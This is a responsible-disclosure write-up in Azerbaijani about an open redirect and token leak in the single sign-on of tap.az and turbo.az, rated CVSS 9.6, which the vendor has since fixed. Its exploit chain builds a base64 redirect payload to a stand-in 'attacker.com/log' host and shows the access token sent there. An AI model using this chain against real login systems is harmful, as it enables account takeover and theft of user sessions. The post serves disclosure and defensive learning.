You like that, huh?

Would you like some help on this one?
  1. Home
  3. Blog
  5. Open Redirect To Ato

AZƏRBAYCANIN ƏN ÇOX ZİYARƏT EDİLƏN PLATFORMALARINDA CVSS 9.6 HESAB ƏLƏ KEÇİRMƏ

1000 rvfet

AI Audio transcription available

Hero image for AZƏRBAYCANIN ƏN ÇOX ZİYARƏT EDİLƏN PLATFORMALARINDA CVSS 9.6 HESAB ƏLƏ KEÇİRMƏ
Read in English
9.6 Critical

CVSS Analysis

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L
Vector
Network
Complexity
Low
Privileges
None
Scope
Changed
Confidentiality
High
Integrity
High

İCMAL (Executive Summary)

2025-ci ilin sentyabr ayında Digital Classifieds Azerbaijan MMC-yə məxsus tap.azturbo.az platformalarında kritik bir təhlükəsizlik boşluğu aşkar etdim. Bu boşluq şirkətin flaqman platformaları üçün mərkəzi autentifikasiya infrastrukturunda mövcud idi.

Open Redirect (Açıq Yönləndirmə) və təhlükəsiz olmayan token ötürülməsi mexanizmlərini birləşdirərək, istifadəçilərə məxsus access_token-lərin (giriş tokenlərini) necə ələ keçirməyin mümkün olduğunu nümayiş etdirdim. Bu zəncirvari boşluq, istifadəçinin giriş məlumatlarına və ya mürəkkəb senariyolara ehtiyac duymadan tam hesab ələ keçirməyə (Account Takeover - ATO) imkan verirdi.

TEXNİKİ İZAH

Boşluq, Vahid Giriş Sistemi (SSO) subdomenlərində mövcud idi: hello.tap.azhello.turbo.az. Bu endpoint-lər istifadəçi sessiyalarını idarə edir və ilkin baxışda olduqca təhlükəsizdir. Lakin, girişdən sonra yönləndirmə üçün istifadə edilən və Base64 ilə kodlanmış URL-ləri qəbul edən back_to/return_to parametri təhlükəsiz şəkildə konfiqurasiya edilməmişdi. Uğurlu autentifikasiyadan sonra server istifadəçini qeyd olunan URL-ə yönləndirir və access_token-i sorğu sətrinə (query string) əlavə edirdi.

ƏSAS SƏBƏB (The Root Cause)

İstismar zəncirini yaradan iki fərqli konfiqurasiya xətası var idi:

  1. Zəif Validasiya: back_to/return_to parametrləri Base64 ilə kodlanmış URL-ləri qəbul etsə də, dekod edilmiş mənbənin allow-list-də və ya relative path olmasını yoxlamırdı. Bu, pis niyyətli URL-lərin istifadə olunaraq istifadəçiləri hücumçunun nəzarət etdiyi saytlara yönləndirməyə imkan verirdi.
  2. Token Sızması: İstifadəçini yönləndirərkən, server həssas access_token (JWT) məlumatını təhlükəsiz header-lər və ya cookie-lər əvəzinə birbaşa hədəf URL-in sorğu sətrinə əlavə edirdi.

HÜCUM ZƏNCİRİ (The Exploit Chain)

  1. Kontent (Payload): Hücumçu zərərli hədəfi base64 şəklində kodlayır: base64("https://attacker.com/log").
  2. Çatdırılma: Hücumçu şirkətin rəsmi SSO sistemini istismar edir: https://hello.tap.az/login?back_to=[PAYLOAD].
  3. İcra: İstifadəçi giriş etdikdən sonra server onu sözügedən tokenlə birlikdə hücumçunun URL-inə yönləndirir: https://attacker.com/log?access_token=eyJhbGci....
  4. Sızdırma: Brauzer https://attacker.com/log?access_token=eyJhbGci... ünvanına keçid edir və sessiya məlumatlarını hücumçunun serverinə sızdırır.
  5. Gizlətmə: Hücumçu bir qədər opseclə bağlı düşünsə, şübhə yaratmamaq üçün token ələ keçirildikdən sonra istifadəçini yenidən orijinal sayta yönləndirə bilər. Əgər 30X (301, 302, 307 və s.) yönləndirmələrdən istifadə olunarsa, hətta browser tarixçəsində də heç bir iz qalmır.

KONSEPTİN SÜBUTU (Proof of Concept)

Boşluğu nümayiş etdirmək üçün Beeceptor istifadə edərək, hücumçunun tokenləri necə ələ keçirə biləcəyini göstərən zərərsiz bir PoC hazırladım.

TƏSİR ANALİZİ

Bu boşluğun təsiri kritik qiymətləndirilir:

  • Miqyas: Ölkənin ən böyük ümumi və avtomobil bazarlarında milyonlarla aylıq aktiv istifadəçini və ümumilikdə 5 milyondan çox hesabı əhatə edir.
  • Məlumat Məxfiliyi: Hücumçular tam fərdi məlumatlara (PII), şifrələnməmiş şəxsi mesajlara və əlaqə vasitələrinə daxil ola bilər.
  • Maliyyə Riski: Aktiv elanları manipulyasiya etmək, silmək və ya etibarlı hesablardan saxta məzmun yerləşdirmək imkanı.

VENDOR REAKSİYASI VƏ MÜKAFATLANDIRMA

Mən ciddi şəkildə məsuliyyətli məlumatlandırma (Responsible disclosure) prosesini izlədim. Digital Classifieds Azerbaijan MMC bu prosesdə yüksək peşəkarlıq nümayiş etdirərək, təhlükəsizlik hesabatlarının idarə olunmasında yerli şirkətlər üçün nümunəvi bir standart sərgilədi.

Həmin vaxt aktiv Bug Bounty proqramlarının olmamasına baxmayaraq, əlaqədar şəxslərlə ünsiyyət qurduqdan sonra şirkətin reaksiyası sürətli və peşəkar oldu.

  • 18 Sen 2025: Boşluq aşkar edildi.
  • 19 Sen 2025: PoC yaradıldı; təsir qiymətləndirilməsi yekunlaşdı.
  • 25 Sen 2025: LinkedIn vasitəsilə rəhbərliyə məlumat verildi.
  • 10 Okt 2025: Tam texniki hesabat Təhlükəsizlik Komandasına təqdim edildi.
  • 13 Okt 2025: Daxili analiz və problemin həlli. Komanda lazımi tıdbirləri gördüyünü təsdiqlədi və könüllü olaraq minnətdarlıq şəklində XXXX$ mükafat təyin etdi.
  • 15 Okt 2025: Mükafat XXXX$ məbləğinə artırıldı. Daxili yoxlamadan sonra şirkət boşluğun kritikliyini (ATO) nəzərə alaraq mükafat məbləğini könüllü olaraq təxminən 65% artırdı.

AZƏRBAYCANDA TƏHLÜKƏSİZLİK SƏNAYESİ ÜÇÜN NÜMUNƏ

Məmməd Məmmədov və Digital Classifieds mühəndislik rəhbərliyinin peşəkarlığını xüsusilə qeyd etmək istəyirəm.

Şirkətin xarici təhlükəsizlik hesabatına yanaşması təqdirəlayiqdir. Digital Classifieds hesabatı nəinki qəbul etdi, həm də təhlükəsizlik səviyyəsini artırmaq üçün bunu bir əməkdaşlıq fürsəti kimi dəyərləndirdi. Onlar:

  1. Remediasiyanı Prioritetləşdirdi: 5M+ istifadəçini qorumaq üçün problemi dərhal aradan qaldırdılar.
  2. Tədqiqatı Mükafatlandırdı: Əvvəlcədən mövcud siyasət olmadan belə mükafat təklif etdilər.
  3. Təsirə Dəyər Verdi: Riski kiçiltmək və ya leqal hədə-qorxu əvəzinə, məsuliyyətli şəkildə öz üzərlərinə düşənləri yüksək səviyyədə yerinə yetirdilər.

Bu davranış yerli bazar üçün parlaq bir nümunədir. Kiber təhlükəsizlik peşəkarları ilə əməkdaşlıq effektiv strategiyadır. Digital Classifieds göstərdi ki, onlar üçün istifadəçi məlumatlarının təhlükəsizliyi nə dərəcədə vacibdir.

HƏLL YOLU (Remediation)

Digital Classifieds mühəndislik komandası problemi aradan qaldırmaq üçün aşağıdakı addımları atdığını bildirdi:

  1. Yönləndirmə URL-ləri üçün server tərəfli validasiya tətbiqi (URL əvəzinə ID əsaslı mapping).
  2. back_to/return_to parametrlərinin yalnız daxili domenlərlə məhdudlaşdırılması.
  3. Sessiya tokenlərinin URL parametrlərindən HttpOnly / SameSite cookie-lərinə keçirilməsi.